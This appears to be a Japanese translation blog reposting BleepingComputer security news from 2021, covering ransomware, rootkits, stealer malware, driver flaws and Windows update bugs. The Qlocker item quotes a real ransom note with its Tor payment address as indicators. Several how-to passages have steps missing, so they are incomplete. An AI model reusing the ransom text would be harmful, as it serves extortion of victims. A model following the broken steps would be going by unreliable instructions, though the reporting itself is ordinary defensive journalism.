 最初のテストでは、Conti身代金要求型マルウェアで仮想マシンを暗号化した、これにはおよそ9分かかった。
 Contiが提供する復号プログラムでは、ファイルの復号に22分を要したが、Emsisoftの復号プログラムでは、脅威のアクターの復号プログラムより41%速い13分(9分速い)で、この仕事を終了させた。
 次に、DarkSide身代金要求型マルウェアのサンプルで類似のテストを行った。これは、我々のデバイスを僅か6分で暗号化した。
 DarkSideの復号プログラムは、我々のテストファイルを復号するのに29分を要したが、Emsisoftの復号プログラムでは僅か18分で復号した。我々のテストにおいて、Emsisoftの復号プログラムが37%速かったが、Wosarは、もっと多くのCPUを搭載したマシンでは、もっと優れたパフォーマンスになるだろうと述べている。
 犠牲者は一般的に数千のデバイスと復号するための数テラバイトのデータを持っている。37%と41%速い復号速度は重要であり、リストアのプロセスを数週間とはならなくとも数日は短縮することができる。
 Emsisoftは、特定のランサムウェアを解析し、カスタマイズされた復号プログラムを作成する復元サービスには料金を請求するが、
医療機関には無料でサポート を提供している。 
世界中でWindows 10のPCでGoogle Chromeがクラッシュしている。その修正方法 
 BleepingComputer : News>Security(2021/05/21) 
 Google Chromeが昨日、突然クラッシュし始め、世界中の多くのWindowsユーザが、このブラウザを利用できなくなっている。
 Googleは、5月10日にChrome 90.0.4430.212をリリースした。大部分に関しては、このリリースに関して昨日まで、何の問題も報告されていなかった。
 昨日の朝から
Windows Least によって最初に報告された後、ユーザは、このブラウザを使用中に、Google Chromeの拡張とタブが突然クラッシュしたことを報告し始めた。
 このクラッシュに起因して、Google subreddit(【訳注】Redditのウェブサイトで特定のトピックの議論を目的とするサブフォーラム(Weblioより))とGoogleの製品フォーラムは、この問題に遭遇した人々からの投稿で満たされ始めた。
 「15分前に突然に、Googleは動作を停止した。拡張機能はクラッシュし、全てのページ(設定などのChromeのページを含む)は読み込みを拒否した。画面はブランクになり、タブには「無題」というラベルが付けられ、その横にしかめっ面のフォルダがある」と、ユーザは
Reddit に昨日投稿している。
 BleepingComputer自体は、このような経験はしていないが、ユーザは、Chromeがグレー画面を表示しブラウザの設定や拡張のページを開くことができないと報告している。
 更に、ユーザは、これらのクラッシュが通常モードとシークレットモードの両方で発生すると報告している。
 これは、このクラッシュがGoogle Chromeの %UserProfile%\AppData\Local\Google\Chrome\User Dataフォルダ(このブラウザのあなたのデータ、拡張、設定を格納するために使用される)の問題によって発生していると信じられている。
 Google Product Expertは、ユーザが 'User Data'フォルダのバックアップを作成し、次に、このクラッシュを修正するために以下のステップの一つを実行するように
推奨している 。
 この問題はWindowsでのみ発生しているようなので、以下の指示を提供するが、これはオペレーティングシステム依存である。https://chrome.google.com/sync  に存在し、パスワードが https://passwords.google.com  で表示されることを確認する(パスフレーズがある場合は表示されないが、Sync(同期)データリンクに反映されている必要がある)
ただし、上記の手順で問題を解決できない場合は、以下の手順を試しなさい。 
 一部のユーザは、これらのステップを実行した後、Google Chromeがクラッシュしなくなったと報告している。
 他のユーザでは、Google Chromeを再起動したら、この問題が再び発生したと述べている。
 このクラッシュの原因は明らかになっていないが、最新のブラウザのリリース以来、Googleによって一部のユーザに対して変更が排除されたようである。
 Googleが限定的なテストだけで設定変更や新しい機能からGoogle Chromeユーザを排除するのはいつものことである。これらのテストや設定変更の一つが、大変多くのユーザによって確認されている問題を引き起こしている可能性がある。
 BleepingComputerは、このクラッシュに関する質問をするためにGoogleに接触したが、現時点で回答は得られていない。
大規模なマルウェア キャンペーンは偽の身代金要求型マルウェアを配布している 
 BleepingComputer : News>Security(2021/05/20) 
 大規模なマルウェアキャンペーンは、JavaベースのSTRRATリモートアクセス トロイの木馬(RAT)を押し付けていた。このトロイの木馬は、データを盗む能力と偽の身代金要求型マルウェア攻撃の能力を持つことで知られている。
 一連のTweetで、
Microsoft Security Intelligenceチーム は、この「巨大なeMailキャンペーン」がセキュリティ侵害したeMailアカウントを使用して偽の身代金要求型マルウェア ペイロードを拡散した方法を概要している。
 このスパムメールは、PDF添付ファイルに見えるものを開くように受信者を誘惑している。しかし、この添付ファイルをクリックすると、代わりにRATマルウェアをダウンロードする画像である。
 「このeMailは、PDF添付ファイルを装う画像を含んでいるが、開くと、STRRATマルウェアをダウンロードする悪意あるドメインに接続する」と「このRATは、実際にファイルを暗号化することなしに、身代金要求型マルウェアのように挙動し、ファイルに .crimson 拡張子を追加する悪名高いものである」と、Microsoftは発言している。
 Microsoft Security Intelligenceチームは、Tweetで言及しているように、STRRATマルウェアはバックグラウンドで犠牲者のデータを盗んでいる間、偽の身代金要求型マルウェア攻撃しているように設計されている。
 
G DATAのマルウェア アナリストKarsten Hahn は、2020年06月に、このマルウェアはeMailキャンペーンでWindowsデバイスに感染し、VBScriptスクリプトの二つのステージを介した後に、最終的にRATペイロードを配布する悪意あるJAR(Java ARchive)パッケージを押し付けると発言している。
 STRRATはキーストロークをログし、そのオペレータが遠隔からコマンドを実行することを可能にし、eMailクライアントとブラウザ(Firefox, Internet Explorer, Chrome, Foxmail, Outlook, Thunderbirdを含む)から認証を含む機密情報を収穫することを可能にしている。
 これはまた、リモートアクセスを持つ攻撃者が、侵害されたWindowsシステムでRemote Desktop Hostのサポートを有効にするために、オープンソースRDP Wrapper Library(
RDPWrap )をインストールすることで感染したマシンへのアクセスすることを提供している。
 しかしながら、他のRATから目立たせたことは、この身代金要求型マルウェアモジュールが、ファイルに ".crimson" 拡張子を追加するだけで、如何なるファイルも暗号化していないことである。
 これはファイルのコンテンツへのアクセスをブロックすることはないが、一部の犠牲者は、ペテンに引っ掛り、攻撃者の身代金要求に応えている可能性がある。
 「このようなファイルはダブルクリックではもはや開かないので、この恐喝が成功する恐れがある」と「Windowsはファイルの拡張子でファイルを開くための正しいプログラムを関連付けているので、もしも拡張子が削除されていると、ファイルは通常のように開かない」と、Hahnは
発言 している。
 Microsoftは、先週の大規模なSTRRATキャンペーンを分析しているときに発見したように、このマルウェアの開発者は、それを改善し、難読化を追加し、モジュラーアーキテクチャを拡張し続けている。
 それでも、ブラウザや電子メール クライアントの認証情報を盗んだり、リモートコマンドやPowerShellスクリプトを実行したり、被害者のキーストロークを記録したりする、このRATの主な機能は
殆ど変更されていない 。 
最近のWindows 10アップデートはMicrosoft Teams, Outlookのログインをブロックする 
 BleepingComputer : News>Security(2021/05/19) 
 最近のWindows 10 1909累積アップデートは、Microsoft 365デスクトップユーザがMicrosoft Teams, Microsoft Outlook, Microsoft OneDrive for Businessへのログインを妨げている。
 ログインを試みた時、ユーザは、 "We ran into a problem. Reconnecting…"とするメッセージが表示され、このプログラムを再起動するようユーザに要請される。
 この画面はまた、下図に示すようにエラーコード80080300を画面の左下隅に表示している。
 この問題は、先週リリースされた
2021年05月の定例アップデート の一部であるWindows 10 1909 
KB5003169 累積アップデートによって発生する。
 この問題を修正するために、Microsoftは、このアップデートのインストールが終了した後、もう一度Windows 10を再起動する必要があると述べている。
 「我々は、Windows Update KB5003169を適用した一部のユーザが、Microsoft Teams, Outlook, OneDrive for Businessを含む様々なMicrosoft 365デスクトップ クライアントに接続できないとするレポートを受け取っている」と、「我々の調査によると、最近配備されたWindows Updateによって明らかになったコードの問題(KB5003169で詳細に説明している)が、この問題の原因であることが判明した」と、Microoftは最近のMicrosoftアドバイザリで説明している。
 Microsoftは、彼らのテレメトリ(遠隔測定法)は、ごく僅かなパーセンテージのユーザが、Windows 10を再起動するまで、このバグによる影響を受けていることを示していると、述べている。
 Windows 10を再起動しても、この問題が解決されない場合、Microsoftが、この問題を調査している間は、 
Microsoft Teams , 
OneDrive for Business , 
Outlook のWebバージョンを使用するように推奨している。
Windows 10 KB5003173アップデートはエラー0x800f0922で失敗する。修正する方法 
 BleepingComputer : News>Security(2021/05/14) 
 Windows 10 KB5003173累積アップデートは、Microsoft Edgeをこれまでにアンインストールしていた場合には、0x800f0922エラーを表示してインストールに失敗する可能性がある。
 Microsoftが今週、
2021年05月の定例アップデート の一部として
Windows 10 KB5003173累積アップデート をリリースした後、一部のユーザは、このアップデートをインストールできないことを発見した。
 代わりに、このアップデートをインストールした後に、0x800f0922エラーが発生し、このアップデートのインストールが妨げられたとするメッセージがWindows Updateに表示される。
 BleepingComputerの読者は、Windows 10から提供されている新しいMicrosoft Edgeをこれまでにアンインストールしたユーザに関して、このアップデートに失敗すると
レポート している。
 9月以来、Microsoftは、Windows 10に
この新しいMicrosoft Edgeを強制的にインストール してきたが、ユーザは依然として、望むのであれば
Edgeブラウザを手動削除する ことができた。
 この新しいMicrosoft Edgeをアンインストールすると、Edgeのアンインストーラは、関連する全てのファイルを削除するが、幾つかの空のフォルダを残したままにする。
 Windows 10 KB5003173アップデートは新しいMicrosoft Edgeを含んでおり、Edgeを再インストールするはずであるが、これらの空のフォルダが、0x800f0922アップデートを吐いてこのアップデートを失敗させる。
 このバグの修正には、Windows 10のユーザは二通りの選択肢がある。
1.Microsoft Edge を手動でダウンロードしインストールする。次に、Windows 10 KB5003173累積アップデートをもう一度インストールする。 
 この二つのオプションの何方かが機能し、最新の累積アップデートは成功裏にインストールできる。
新たなMoriyaルートキットは、Windowsシステムにバックドアを開けるためにオンライン上で使用されている 
 BleepingComputer : News>Security(2021/05/06) 
 未知の脅威のアクターはターゲットのWindowsシステムにバックドアを空けるためにステルス性のルートキットを使用している。これは、少なくとも2018年以降のTunnelSnakeと名付けられた進行中のスパイ キャンペーンのように見える。
 
ルートキット は、オペレーティングシステムの深層に隠れることによって検出を回避するように設計された悪意あるツールである。ルートキットは、攻撃者が検出が回避されている間は、攻撃者が感染したシステムを完全に乗っ取るために使用することができる。
 以前の未知のマルウェア(オンライン上で発見され
Kaspersky研究者によってMoriyaと名付けられた )は、攻撃者が犠牲者のネットワークトラフィックを秘密裏にスパイし、セキュリティ侵害されたホストにコマンドを送信することを可能にする受動的バックドアである。
異常な程こ狡いスパイ バックドア 
 Moriyaは、TunnelSnakeオペレータが「Windowsカーネルのアドレス空間、オペレーティングシステムのカーネルに存在し、一般的に特権コードと信頼コードを実行するメモリ領域から」のインカミング ネットワークトラフィックを捕獲し解析することを可能にした。
 このバックドアが、コマンドアンドコントロールサーバに到達する必要なしに、犠牲者のネットワークトラフィック中に隠されているカスタムクラフトされたパケットの形式でコマンドを受け取っていた方法に、更にオペレーションのステルス性が追加された。これは、脅威のアクターの重点が検出回避にあることを示している。
 「我々は、TunnelSnakeのような大変秘密裏に行なわれているキャンペーンを確認している。このキャンペーンでは、攻撃者は可能な限りレーダーに見つからずに存在するために、ツールセットに投資し、より調整し、複雑にし、検出を困難にするための追加のステップとをとっている」と、KasperskyのGlobal Research and Analysis Teamの上級セキュリティ研究者Mark Lechtikは
述べている 。
 Kasperskyのテレメトリ(遠隔測定装置)によると、このマルウェアは、標的を絞った攻撃で10未満のエンティティのネットワーク上に配備されていた。
 この脅威のアクターは、アジアとアフリカの外交組織やその他の著名な組織に属するバックドア化されたシステムを使用して、ネットワークを制御し検出されることなく数か月間持続した。
 この攻撃者はまた、改竄されたシステム(カスタムメイドで以前は中国語圏の攻撃者によって使用された)の攻撃後のステージの間に、追加のツール(China Chopper, BOUNCER, Termite, Earthwormを含む)を配備した。
 これは、犠牲者のネットワーク上をスキャンし新しく脆弱性のあるホストを発見した後、文字通り彼らはネットワークを移動することが可能になる。
攻撃者が中国語圏であることを示す全ての証拠 
 Kasperskyの研究者は、キャンペーンを特定の脅威アクターに帰することはできなかったが、攻撃で使用された戦術、技術、手順(TTP)と、標的となるエンティティが、攻撃者が中国語圏である可能性が高いことを示唆している。
 KasperskyのGlobal Research and Analysis Teamの上級セキュリティ研究者であるGiampaoloDedolaは、「2018年のスタンドアロン攻撃で使用された古いバージョンのMoriyaも発見した。これは、少なくとも2018年以降、この攻撃者が活動していたことを示している」と、「ターゲットのプロファイルと悪用されたツールセットは、このキャンペーンにおける攻撃者の目的が、スパイであることを示唆してるが、実際に吸い上げたデータの認知度の欠如により、この件に関しては部分的にしか証明できない」と、
付け加えている 。
 Moriyaルートキットに関する技術的な詳細とTunnelSnakeキャンペーンに関連するセキュリティ侵害の痕跡は、
Kasperskyのレポート に見出すことができる。
 10月、Kasperskyは、2つの非政府組織(NGO)に対しての2019年からの攻撃を調査しているときに、
オンラインで使用された過去2番目のUEFIルートキット (MosaicRegressorとして知られる)も発見している。
 
オンラインで使用されていたこれまでのUEFI Bootkitは、LoJaxとして知られて おり、ロシア政府系のAPT28ハッキンググループによって、合法的なLoJack盗難防止ソフトウェアに注入されていた2018年にESETによって発見されている。 
Windows DefenderのバグがWindows 10ブートドライブを数千のファイルで満たしている 
 BleepingComputer : News>Security(2021/05/05) 
 Windows Defenderのバグは、数千の小さなファイルを作成し、Windows 10ハードドライブで数Gバイトの保存スペースを浪費している。
 このバグは、Windows Defenderアンチウィルス エンジン1.1.18100.5に始まり、MD5ハッシュであるかのような名前の数千のファイルで、C:\ProgramData\Microsoft\Windows Defender\Scans\History\Storeフォルダを満たそうとする。
 BleepingComputerによって確認されたシステムでは、作成されたファイルのサイズは、600バイトから1KBを少し超える程度の範囲である。
 我々が検証したシステムでは、およそ1MBのファイル群で満たされていただけだったが、他のWindows 10ユーザは、彼らのシステムが数千のファイルで満たされ、
或る場合 では、30GBのストレージ容量が使用されていたと
報告 している。
 容量の少ないSSDシステムドライブ(C:)では、ストレージのかなりのスペースが不要なファイルで浪費されることが懸念される。
 この問題を
最初にレポート したDeskmodderによると、このバグは現在、最新のWindows Defender, version 1.1.18100.6で修正されている。
 Windows 10ユーザは、画面左下隅にある設定用の歯車アイコン(Settings cog icon)をクリックしAboutを選択することで、Windows Securityに移動し、
Windows Defenderのバージョンをチェックする ことができる。
 エンジンのバージョンが1.1.18100.6未満で示された場合は、Windows Updateに移動し、アップデートの確認(Check for Update)をクリックし、最新のセキュリティ インテリジェンス更新プログラム(Security Intelligence Update for Microsoft Defender Antivirus)アップデートをダウンロードしなさい。
 このアップデートが有効であれば、Windows Updateは自動的にアップデートをインストールし、Windows 10の再起動を要求することはない。
脆弱性のあるDellドライバが数億のシステムを危険にさらしている 
 BleepingComputer : News>Security(2021/05/04) 
 過去12年に渡り、一般消費者用と企業用のDellコンピュータデバイスに搭載されていたドライバは、そのシステム上で特権の昇格に導く可能性のある複数の脆弱性を含んでいる。
 デスクトップ、ラップトップからタブレットに至る数億のDellコンピュータが、BIOSアップデートを介して脆弱性あるドライバを受け取ったと見積もられている。
1つの中に5つのフロー 
 まとめてCVE-2021-21551として追跡される5つのフローのコレクションは、DellマシンがBIOSアップデートプロセス中にインストールされロードされ、次の再起動時にはロードされないドライバであるDBUtil中に発見された。
 サイバーセキュリティ企業SentinelOneのセキュリティ研究者Kasif DekelよるDBUtilドライバの詳細な検証の結果、「非管理者ユーザからカーネルモード特権(【訳注】マイクロプロセッサ(CPU/MPU)の実行モードの一つで、すべての命令を制限なく実行できるモード(e-Wordより))に特権を昇格させる」悪用が可能であることが発見された。
 このレベルのパーミッションで行動している攻撃者のコードは、あらゆるメモリアドレス参照を含むそのシステム上で利用可能な全てのハードウエアに無制限にアクセスできる。
 この種の脆弱性は、攻撃者が悪用するには事前にそのコンピュータを改竄する必要があるために緊急とは考えられていない。しかしながら、脅威のアクターとマルウェアは感染したシステムに永続性を獲得することが可能である。
 追跡番号は1つであるが、そこには5つの個別のフローがあるとDekelは発言している。脆弱性の殆どは、特権の昇格を導くものであり、1つのコードロジック問題は、Denial of Service(DoS)を導くものである。
	CVE-2021-21551 
	ローカルの特権昇格 
	メモリ損壊  
	 
	CVE-2021-21551 
	ローカルの特権昇格 
	メモリ損壊  
	 
	CVE-2021-21551 
	ローカルの特権昇格 
	入力検証の欠如 
	 
	CVE-2021-21551 
	ローカルの特権昇格 
	入力検証の欠如 
	 
	CVE-2021-21551 
	Denial of Service 
	コードロジック問題 
	 
 
 この研究者は、本日のブログへの投稿で技術情報を提供しているが、ユーザにパッチを適用する時間を与えるために、このフローをトリガーしたり悪用したりするための詳細は控えている。彼は6月1日に概念の実証エクスプロイト コードを共有する計画である。
 DekelはDellがこの脆弱性用の
セキュリティアドバイザリ を準備していると発言している。この救済策は、修正されたドライバであるが、この研究者は、このレポートを記述している時点で、Dellは脆弱性のあるドライバに関する証明書を無効にしていなかったと、つまり、ネットワーク上の攻撃者は依然として攻撃にこの脆弱性を使用することができることを意味していると発言している。
 「組織のネットワークにアクセスできる攻撃者は、未パッチのDellのシステムで、コードを実行するためのアクセス権を取得し、この脆弱性を利用してローカルの特権昇格を取得する可能性がある。次に、攻撃者は他のテクニックを活用して、横断的により広範なネットワークに方向転換することができる」- SentinelOne 
 
 脆弱なDBUtilドライバーが長寿命であり、潜在的な被害者が多数いるにもかかわらず、SentinelOneは、すぐに変更される可能性があものの、これらの脆弱性が実際に悪用されていることを示す指標は見られないと述べている。
 SentinelOneは、脆弱なDBUtilドライバーを悪用して、ターゲットシステムでローカルの特権の昇格を達成できることを示す
ビデオを公開 した。 
Windows 10 DefenderがMicrosoftへのファイル アップロードを停止する方法 
 BleepingComputer : News>Security(2021/05/02) 
 他のアンチウィルス プログラムのように、Microsoft Defenderも、それらが悪意あるものか否かを決定するためにMicrosoftにファイルをアップロードする。しかしながら、これをプライバシーリスクと見做し、サードパーティーにアップロードするより、自身のコンピュータ上に置いたままにしておきたいとする人々がいる。
 Microsoft Defenderはデバイスをスキャンすると、Defaultで、ファイルが悪意あるものであると疑われる時、そのファイルをMicrosoftサーバにアップロードするために「自動サンプル送信」機能を使用する。
 Microsoftのクラウドベースの保護は、ファイルを解析し悪意あるものであれば、Microsoft Defenderは、そのデバイス上にそのファイルを隔離する。
 ファイルを送信する時、Microsoft Defenderは実行ファイルとスクリプトは自動的にアップロードするが、ドキュメントのような個人情報を含む恐れのあるファイルをアップロードするときには最初にユーザに警告している。
 「Windows Defender ウイルス対策がオンの場合は、デバイスのセキュリティ状態を監視します。Windows Defenderによって、マルウェアの疑いがあるソフトウェアやその他の望ましくないソフトウェアについて Microsoft に送信するレポートが自動的に作成されます。このレポートには、マルウェアが存在する可能性があるファイルが含まれる場合もあります」と、「ユーザ データが含まれる可能性が低いファイルは自動的に送信されます。ただし、Windows Defenderウイルス対策がドキュメント、スプレッドシート、またはその他の種類の個人用コンテンツが含まれる可能性があるファイルを送信しようとする場合には、許可を求められます(【訳注】共にMicrosoft日本語ホームページより引用)」と、
MicrosoftのWindows 10とオンラインサービス でMicrosoftは説明している。
プライバシーリスクの可能性? 
 私は、解析のために疑わしいファイルをアップロードすることは大変役に立つ機能だと考えるが、一部のアンチウィルスユーザは、これをプライバシーリスクと捉え無効化したいかもしれない。
 「おそらく、最も重要なのはプライバシーである。これらは私のコンピュータ上の私のファイルなので、人が読もうが読むまいが、私の許諾なく送信されたくない」と、この機能を無効化したいWindows 10ユーザは
説明している 。
 自動ファイル送信はまた、米国政府とロシアのアンチウィルス企業Kasperskyとの間での仲違いを発生させる可能性もある。
 2015年、Kasperskyは、ミステリアスな"Equation Group"に関連する一連のNSA(米国家安全保障局)の監視とハッキングツールを検出したと公開した。
 これらのツールは、これらのツールを持ち帰り、Kasperskyアンチウィルスを稼働させている自身のPCにそれらを格納したNSAの協力者のPCから
繰り返しアップロードされた 。このアンチウィルスは、これらのファイルを疑わしいものとして検出し、当時ロシアにあったKasperskyのサーバにアップロードした。
Microsoft Defenderの自動ファイルアップロードを無効にする方法 
 我々は、依然としてユーザのコンピュータのセキュリティを向上させるために自動サンプル送信を可能にするように提案するが、あなたがMicrosoft Defenderの機能を無効にしたいのであれば、以下のステップを使用する。
1. スタートメニューをクリックし、"Windows Security”で検索する。検索結果にこれが表示されたら、これを開く。
4. Virus & threat protection(ウイルスと脅威の防止)で、スクロールダウンし、以下の図に示したように 'Automatic sample submission'(自動サンプル送信)を無効にする。
5. 無効に設定したら、User Account Control(UAC、ユーザアカウント制御)が表示されるのでYesボタンをクリックする。
 
 自動サンプル送信は、これで無効化された。上記ステップを逆にすることで再び有効にすることができる。
MicrosoftがIoT、OTデバイス中に緊急のコード実行のバグを発見 
 BleepingComputer : News>Security(2021/04/29) 
 Microsoftの研究者は、Internet of Things (IoT)デバイスとOperational Technology (OT) 産業システム中に、2ダースに及ぶ緊急のリモードコード実行の脆弱性を発見した。
 これら25のセキュリティフローは、まとめて
BadAlloc として知られており、メモリアロケーションの
Integer OverflowやWraparound バグを原因として発生する。
 脅威のアクターは、脆弱性のあるIoTとOTシステム上でシステムクラッシュのトリガーにし、リモートから悪意あるコードを実行するために、これらの脆弱性を悪用することができる。
 この脆弱性は、Microsoftの研究者が、複数のリアルタイム オペレーティングシステム(RTOS), C標準ライブラリ(libc)実装, 組み込みソフトウェア開発キット(SDKs)で広汎に使用されている標準メモリアロケーション関数中に発見したものである。
 「我々の調査によると、IoTデバイスと組み込みソフトウェアの一部として長年にわたって記述されていたメモリアロケーションの実装には、適切な入力検証が組み込まれていない」と、「これらの入力検証がないので、攻撃者は、メモリアロケーション関数を悪用し、ヒープオーバーフローを発生させ。結果として、ターゲットののデバイス上で悪意あるコードを実行することができる」と、Microsoftセキュリティ レスポンスセンターのチームは発言している。
BadAlloc攻撃に対して脆弱なデバイス 
 BadAlloc脆弱性によって影響を受ける脆弱性のあるIoTとOTデバイスは、消費者、医療、産業用ネットワークに見つけることができる。
 BadAllocによって影響を受けるデバイスの完全なリストは、以下を含んでいる(パッチへのリンクは
CISAのアドバイザリ 中で利用できる)。
・ Amazon FreeRTOS, Version 10.4.1 
BadAlloc緩和策 
 この脆弱性は、発見されCISAに通報された、IoT研究グループのMicrosoftの'Section 52' Azure Defenderのセキュリティ研究者David Atch, Omri Ben Bassat, Tamir Arielによってベンダに強い衝撃が与えられた。
 このセキュリティ侵害のリスクを軽減するために、CISAは、BadAlloc攻撃に対して脆弱性のあるデバイスを使用している組織に以下を実行するよう推奨している。
・ 利用可能なベンダのアップデートを適用するインターネットからアクセスできない ようにする 
 脆弱性のあるデバイスが即座にパッチできないのであれば、Microsoftは以下のことをアドバイスしている。
・ 脆弱性のあるデバイスがインターネットへの露出を最小化したり排除したりすることによって、攻撃される対象領域を減少する 
 CISAはまた、
実行が推奨される制御システムセキュリティ と
標的型サイバー侵入検知と緩和戦略 に関する技術情報論文も提供している。
 これまでのところ、Microsoftは、BadAllocの積極的な悪用を検出していないが、CISAは、追跡を容易にするために、組織を標的とした悪意のある活動を報告するよう組織に求めている。
 米国国家安全保障局(NSA)は本日早く、ITおよびOTコネクションのリスクを評価し、悪意のある活動の防御と検出に関する
セキュリティ アドバイザリ を公開した。 
Twitter誤ってアカウント確認を依頼する疑わしいメールを送信 
 BleepingComputer : News>Security(2021/04/21) 
 Twitterは、彼らがユーザにアカウントの確認を要請するeMailを誤って送信したことで、木曜日の夜、完全なパニックに陥った。このメールはフィッシング攻撃のように見えるものである。
 これらのeMailは、多数のTwitterアカウントを持つBleepingComputerで、そのライターが受け取ったは米国東部時間の10時頃のことである。
 これらのeMailは、 件名に"Confirm your Twitter account" (日本では、「Twitterアカウントを確認してください」)が使用されており、'Confirm Now'とラベルされたボタンが含まれている。eMail中のリンクは全て正当なもののように見えるが、我々にとって予期しないeMailであったので、即座にフィッシング攻撃ではないかと疑った。
 ユーザがこのメールに対する懸念をTwitterに照会したので、このeMailに疑いを持ったのは我々だけではなかったことが判明した。
 この確認メールは、Twitterによる単純な誤りであることが
Twitter Supportアカウント によって確認されたので、フィッシング攻撃ではないことが判明した。
 受信トレイにTwitter確認eMailの存在を見つけた人は、このメッセージを確実に無視し削除しなさい。
【訳者補注】この件に関する日本語情報としては、
こちらのサイト もあります.
大規模なQlocker身代金要求型マルウェア攻撃は7zipを使用してQNAPデバイスを暗号化している 
 BleepingComputer : News>Security(2021/04/21) 
 世界中のQNAPデバイスをターゲットにした大規模な身代金要求型マルウェアキャンペーンが進行中であり、ユーザは、パスワードで保護された7zipアーカイブ中に彼らのファイルが格納されていることを発見している。
 この身代金要求型マルウェアは、Qlockerと呼ばれており、2021年04月19日にQNAPデバイスを標的にし始めた。それ以来、我々のサポートフォーラムは大変な活況を呈し、ID-Ransomware(【訳注】被害者がファイルを暗号化したランサムウェアを特定できる、BleepingComputerのWebサイト)では被害者からの投稿が急増している。 
 BleepingComputer Qlockerサポートトピック への犠牲者からのレポートによると、攻撃者は7zipを使用してQNAPデバイス上のファイルをパスワードで保護されたアーカイブに移動する。ファイルがロックされている間に、QNAP Resource Monitorは、7zipコマンドライン実行である多数の'7z'プロセスを表示する。 
 この身代金要求型マルウェアが終了すると、QNAPデバイスのファイルは、.7z拡張子で終了するパスワードで保護された複数の7-zipアーカイブに格納される。この複数のアーカイブを解凍するには、犠牲者は、攻撃者のみが知っているパスワードを入力する必要がある。 
 QNAPデバイスが暗号化されると、ユーザは!!!READ_ME.txt脅迫文を残される。この脅迫文は、犠牲者がTor支払いサイトにログインするために入力する必要のある一意のクライアントキーを含んでいる。 
 BleepingComputerが確認したQlocker脅迫文から、犠牲者は、アーカイブファイル用のパスワードを得るために0.01 Bitcoin(およそ、$557.74。60,289円)の支払いを告げられている。 
Update 4/22/21 12:44 AM(米国東部時間): 弱点が発見された可能性がある。犠牲者は無料でファイルを復元できる可能性がある。依然として調査中なので、10 AM(米国東部時間)くらいにアップデートを投稿する。
Update 4/22/21 09:15 AM(米国東部時間): 今朝早く、BleepingComputerは、Jack Cable からQlockerのTorサイトで、ユーザーが7zipパスワードを無料で復元できるバグを発見したと連絡を受けた。 
 
QNAPは最近の脆弱性を使用されている 
 最近QNAPは、リモート攻撃者がデバイスへのフルアクセスを取得し、身代金要求型マルウェアを実行することが可能な緊急の脆弱性を解決した。
 QNAPは、以下の説明と共に二つの脆弱性を4月16日に修正した。
 これらの脆弱性に関する詳細な情報は、QNAPに対してバグを公開したSAM Seamless Network研究チームによる
ブログの投稿 中に見出される。
 QNAPがBleepingComputerに告げたところによると、彼らは、脆弱性のあるデバイスに身代金要求型マルウェアを実行できるCVE-2020-36195脆弱性をQlockerに攻撃されたと確信している。
 これにより、QTS, Multimedia Console, Media Streamingアドオンを最新バージョンにアップデートすることが強く推奨されている。
 これはファイルを復元することはないが、この脆弱性を使用する将来の攻撃からあなたを守ることになるだろう。
Qlocker IOCs: 
関連するファイル 
!!!READ_ME.txt
脅迫文 
!!! All your files have been encrypted !!!
 
All your files were encrypted using a private and unique key generated for the computer. This key is stored in our server and the only way to receive your key and decrypt your files is making a Bitcoin payment.
 
To purchase your key and decrypt your files, please follow these steps:
 
1. Dowload the Tor Browser at "https://www.torproject.org/". If you need help, please Google for "access onion page".
 
2. Visit the following pages with the Tor Browser:
 
gvka2m4qt5fod2fltkjmdk4gxh5oxemhpgmnmtjptms6fkgfzdd62tad.onion
 
3. Enter your Client Key:
 
[client_key]
偽のMicrosoft Store, Spotifyサイトが情報を盗むマルウェアを拡散している 
 BleepingComputer : News>Security(2021/04/18) 
 攻撃者は、Webブラウザに保存されているクレジットカードやパスワードを盗むためのマルウェアを配布するためにMicrosoft Store, Spotify, オンライン ドキュメント コンバータを装うサイトを宣伝している。
 この攻撃は、サイバーセキュリティ企業ESETによって発見され、昨日Twitterで悪意あるキャンペーンに注意せよとする
警告が発せられた 。
 ESETの脅威検出研究所の所長
Jiri Kropac との会話で、BleepingComputerは、この攻撃が正当なアプリケーションであるかのように宣伝する悪意ある広告を介して運営されていることを認識した。
 例えば、この攻撃に使用されている広告の一つは、オンラインChessアプリケーションを宣伝している。
 しかしながら、ユーザがこの広告をクリックすると、ユーザはインチキの'xChess 3'オンライン チェス アプリケーション用の偽のMicrosoft Storeのページに連れて行かれ、Amazon AWSサーバから自動的にダウンロードされる。
 ダウンロードされたZIPファイルは、'xChess_v.709.zip' [
VirusTotal ]と名付けられている。これは実際には'Ficker'もしくは'FickerStealer'である。このソフトはBleepingComputerによって作成された 
Any.Run report に示されているように、偽装した情報を盗むマルウェアである。
 このマルウェア キャンペーンの他の広告は、Spotify(下図参照)やオンライン ドキュメント コンバータを装っている。訪問すると、ユーザが到着したページもFickerマルウェアを含むZIPファイルを自動的にダウンロードする。
Fickerマルウェアはどのようなものか 
 Fickerは、開発者が別の脅威のアクターにこのマルウェアを有料で貸出を始めた1月にロシア語で意思の疎通をするハッカーフォーラムにリリースされた情報を盗むためのトロイの木馬である。
 フォーラムへの投稿で、この開発者は、このマルウェアの能力を説明し、他の脅威のアクターが1週間から6ヶ月、誰かからこのソフトウェアを借りることを可能にしている。
 このマルウェアを使用して、脅威のアクターは、Webブラウザ、デスクトップ メッセージング クライアント(Pidgin, Steam, Discord)、FTPクライアントに保存されている証明書を盗むことができる。
 パスワードを盗むことに加えて、この開発者は、このマルウェアが15以上の暗号通貨ウォレットを盗むことができ、ドキュメントを盗むことができ、犠牲者のコンピュータで稼働中のアクティブなアプリケーションのスクリーンショットを撮ることができると主張している。
 この情報はZIPファイルにコンパイルされ攻撃者に送り返される。そこで彼らはデータを解凍し、他の悪意ある行動に使用することができる。
 Fickerマルウェアの拡張された機能により、このキャンペーンの犠牲者は、即座にオンラインパスワードを変更し、ファイアーウォールで疑わしいポート フォワーディング ルールをチェックし、更なるマルウェアをチェックするためにアンチウィルススキャンを実行すべきである。
WordPressはそのWebサイトでGoogle FLoCを自動的に無効化する 
 BleepingComputer : News>Security(2021/04/18) 
 WordPressは、Googleの新しいFLoCトラッキング テクノロジをセキュリティ上の懸念事項として取扱、WordPressサイトでDefaultでブロックする可能性があることを本日アナウンスした。
 かなりの期間、各ブラウザは、関心に基づく広告のために広告主によって使用されるサードパーティのブラウザクッキー[
1 ,
2 ,
3 ]のブロックが増加していた。
 これに応えて、GoogleはFederated Learning of Cohorts(FLoC)と呼ばれる新しい広告追跡テクノロジーを導入した。このテクノロジは、Webブラウザを使用して、ユーザがWebをブラウズする方法に基づいて、ユーザを匿名で関心や挙動のグループに分けるものである。
